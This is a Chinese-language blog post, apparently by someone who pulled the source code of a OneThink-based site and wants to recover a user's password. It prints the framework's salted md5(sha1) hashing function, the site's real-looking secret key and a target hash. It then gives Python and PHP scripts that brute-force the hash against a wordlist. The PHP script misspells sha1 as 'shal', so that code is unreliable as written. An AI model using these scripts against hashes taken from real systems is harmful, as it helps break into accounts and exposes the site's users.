昨天遇到一个基于onethink开发的程序。源码是脱下来了。但是密码始终破解不了。来看看加密函数
function think_ucenter_md5($str, $key = 'ThinkUCenter'){
return '' === $str ? '' : md5(sha1($str) . $key);
}
if(is_array($user) && $user['status']){
/* 验证用户密码 */
if(think_ucenter_md5($password, UC_AUTH_KEY) === $user['password']){
$this->updateLogin($user['id']); //更新用户登录信息
return $user['id']; //登录成功,返回用户ID
} else {
return -2; //密码错误
}
define('UC_AUTH_KEY', 'W#RZ5cfy1n]Qk3zu2HvgqC@>Gt0%&P|DJr{^EM9!');
总感觉无法可逆,所以只能爆破,有更好方法的大大,介绍给我
py版本
#coding:utf-8 #author:jwong import hashlib key = 'W#RZ5cfy1n]Qk3zu2HvgqC@>Gt0%&P|DJr{^EM9!' result = '9fdf7c3ba521d12db4d56540eb1bca15' def md5(str): m = hashlib.md5() m.update(str) return m.hexdigest() def sha1(str): s = hashlib.sha1() s.update(str) return s.hexdigest() def main(): try: with open('password.txt','rb') as f: for line in f.readlines(): print "trying: %s " % line str1 = sha1(line) + key password = md5(str1) if password == result: print 'password is %s ' % line except Exception, e: print 'could not open file' , e if __name__ == '__main__': main()
php版本
<?php $filename = 'password.txt'; $lines = @file($filename, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) or die('file not fount!'); $key = 'W#RZ5cfy1n]Qk3zu2HvgqC@>Gt0%&P|DJr{^EM9!'; $md5_pass = "9fdf7c3ba521d12db4d56540eb1bca15"; foreach($lines as $line){ $str1 = md5(shal($line).$key); if($str1 == $md5_pass){ echo 'password: '.$line; break; } } ?>